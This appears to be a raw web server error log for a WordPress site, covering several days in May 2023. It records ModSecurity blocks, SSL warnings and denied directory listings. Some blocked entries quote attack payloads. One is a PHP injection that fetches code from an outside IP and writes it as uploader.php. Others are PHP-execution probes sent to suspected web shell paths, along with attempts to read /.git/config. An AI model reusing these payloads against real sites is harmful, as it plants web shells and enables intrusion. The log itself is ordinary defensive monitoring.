5.188.62.26:59388] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZF3ZHS4fPYweRNutzJI-NgAAAM8"] 2023/05/12 01:18:26 [error] 20207#20207: *1053870 access forbidden by rule, client: 164.92.155.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/05/12 01:18:27 [error] 20206#20206: *1053871 access forbidden by rule, client: 164.92.155.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/05/12 01:18:27 [error] 20206#20206: *1053872 access forbidden by rule, client: 164.92.155.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/05/12 01:18:27 [error] 20206#20206: *1053873 access forbidden by rule, client: 164.92.155.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri May 12 03:41:18.190331 2023] [ssl:warn] [pid 9693:tid 140335149389696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 03:41:18.326108 2023] [ssl:warn] [pid 9694:tid 140335149389696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 03:41:18.807239 2023] [ssl:warn] [pid 9694:tid 140335149389696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 03:41:21.003525 2023] [ssl:warn] [pid 9694:tid 140335149389696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 03:41:23.263343 2023] [ssl:warn] [pid 10111:tid 139645787879296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 03:41:23.428721 2023] [ssl:warn] [pid 10112:tid 139645787879296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 07:54:50.575330 2023] [:error] [pid 10804:tid 139645459347200] [client 5.188.62.21:47846] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZF43GsxJcN7417yitsvLvAAAAMk"] [Fri May 12 08:46:29.026130 2023] [:error] [pid 10804:tid 139645358634752] [client 20.163.40.61:50458] [client 20.163.40.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZF5DNcxJcN7417yitsvNjwAAANU"], referer: www.google.com [Fri May 12 13:15:01.710157 2023] [:error] [pid 10139:tid 139645590472448] [client 170.106.119.29:36038] [client 170.106.119.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZF6CJeHnDpTLktvCTpLBvwAAAII"], referer: www.google.com [Fri May 12 21:39:09.449994 2023] [:error] [pid 10137:tid 139645607257856] [client 152.89.196.77:60050] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_ne.php"] [unique_id "ZF74TfeNqVQicLczJpKm7wAAAAA"] [Sat May 13 03:20:47.031168 2023] [:error] [pid 10138:tid 139645467739904] [client 152.89.196.77:49524] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:2: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/seoplugins/mar.php"] [unique_id "ZF9IX5_I-vcArMzYp15Y7AAAAEg"] [Sat May 13 03:22:23.082319 2023] [ssl:warn] [pid 13846:tid 140417979381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:23.228466 2023] [ssl:warn] [pid 13847:tid 140417979381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:23.817640 2023] [ssl:warn] [pid 13847:tid 140417979381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:26.002734 2023] [ssl:warn] [pid 13847:tid 140417979381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:29.616491 2023] [ssl:warn] [pid 14418:tid 139777262471040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:29.746208 2023] [ssl:warn] [pid 14419:tid 139777262471040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 03:22:30.452364 2023] [ssl:warn] [pid 14419:tid 139777262471040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 13 04:17:08.470965 2023] [autoindex:error] [pid 14571:tid 139776908826368] [client 20.125.112.145:53734] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 13 08:25:35.869116 2023] [autoindex:error] [pid 15017:tid 139776883648256] [client 43.130.132.205:37388] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 13 18:16:02.288574 2023] [autoindex:error] [pid 14572:tid 139777065064192] [client 20.242.26.189:46358] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 13 19:37:48.240799 2023] [:error] [pid 15017:tid 139776900433664] [client 152.89.196.77:49786] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hello-elementor/vale.php"] [unique_id "ZGAtXF01SQ6BXIytTvW41QAAAM0"] [Sat May 13 22:08:59.667724 2023] [:error] [pid 14572:tid 139776883648256] [client 5.188.62.76:55556] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGBQyzqtWIP4usDXhRs0KAAAAE8"] [Sat May 13 22:18:03.224422 2023] [:error] [pid 14572:tid 139776892040960] [client 5.188.62.174:55850] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGBS6zqtWIP4usDXhRs0PgAAAE4"] [Sun May 14 03:17:21.334989 2023] [:error] [pid 15017:tid 139776808113920] [client 5.188.62.26:42130] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGCZEV01SQ6BXIytTvXF9gAAANg"] [Sun May 14 03:46:20.931952 2023] [ssl:warn] [pid 424:tid 140587122870144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 03:46:21.073998 2023] [ssl:warn] [pid 425:tid 140587122870144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 03:46:21.558555 2023] [ssl:warn] [pid 425:tid 140587122870144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 03:46:23.099372 2023] [ssl:warn] [pid 425:tid 140587122870144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 03:46:25.358858 2023] [ssl:warn] [pid 893:tid 140112663607168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 03:46:25.489995 2023] [ssl:warn] [pid 894:tid 140112663607168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 14 07:13:29.935264 2023] [:error] [pid 919:tid 140112226608896] [client 5.188.62.174:51018] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGDQaXWp4ww7PYWVytXqlQAAABY"] [Sun May 14 09:18:29.021038 2023] [:error] [pid 1128:tid 140112327321344] [client 152.89.196.77:56130] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-matchesmapregex-error-comment.php"] [unique_id "ZGDttQLQd2iYI6UvWwMo5gAAAMo"] [Sun May 14 12:05:41.323755 2023] [:error] [pid 920:tid 140112344106752] [client 5.188.62.140:33796] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGEU5ZWEYyka1tC41w11CwAAAEg"] [Sun May 14 15:38:23.774617 2023] [:error] [pid 920:tid 140112209823488] [client 152.89.196.77:41136] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/system-reboot.php"] [unique_id "ZGFGv5WEYyka1tC41w133gAAAFg"] [Sun May 14 21:21:54.535983 2023] [autoindex:error] [pid 920:tid 140112360892160] [client 20.106.95.98:54186] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun May 14 21:21:54.923866 2023] [autoindex:error] [pid 1128:tid 140112310535936] [client 20.106.95.98:54188] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun May 14 22:38:08.027574 2023] [autoindex:error] [pid 919:tid 140112482985728] [client 95.214.26.15:57000] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 15 03:18:16.285945 2023] [ssl:warn] [pid 2194:tid 139704016701312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:16.413941 2023] [ssl:warn] [pid 2195:tid 139704016701312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:16.756351 2023] [ssl:warn] [pid 2195:tid 139704016701312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:18.774658 2023] [ssl:warn] [pid 2195:tid 139704016701312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:21.013448 2023] [ssl:warn] [pid 2645:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:21.142857 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 03:18:21.830562 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 14:18:23.084501 2023] [:error] [pid 2814:tid 139831996745472] [client 152.89.196.77:42878] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/press/wp-class.php"] [unique_id "ZGKFf6xoDE3dDGSE6geBqwAAAJc"] [Mon May 15 17:54:44.559114 2023] [autoindex:error] [pid 3492:tid 139832147814144] [client 74.201.28.5:52526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon May 15 19:38:19.607626 2023] [:error] [pid 2813:tid 139832122636032] [client 5.188.62.174:56670] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGLQe7WyGLnvl-PKbZ3kpwAAAAg"] [Mon May 15 22:07:35.757203 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 22:07:36.158620 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 22:07:45.211158 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 15 22:52:42.197568 2023] [ssl:warn] [pid 2646:tid 139832437925760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 01:49:59.157529 2023] [:error] [pid 7884:tid 139832021923584] [client 5.188.62.21:44972] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGMnl0h6uwXsqyMOtVFkvAAAAFQ"] [Tue May 16 02:21:41.083609 2023] [:error] [pid 7884:tid 139832063887104] [client 152.89.196.77:46094] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-plugin-dependencies/vale.php"] [unique_id "ZGMvBUh6uwXsqyMOtVFlbgAAAE8"] [Tue May 16 03:26:22.039011 2023] [ssl:warn] [pid 31185:tid 139677386680192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 03:26:22.179543 2023] [ssl:warn] [pid 31186:tid 139677386680192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 03:26:22.663218 2023] [ssl:warn] [pid 31186:tid 139677386680192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 03:26:24.388224 2023] [ssl:warn] [pid 31186:tid 139677386680192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 03:26:27.984423 2023] [ssl:warn] [pid 31630:tid 140636725987200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which 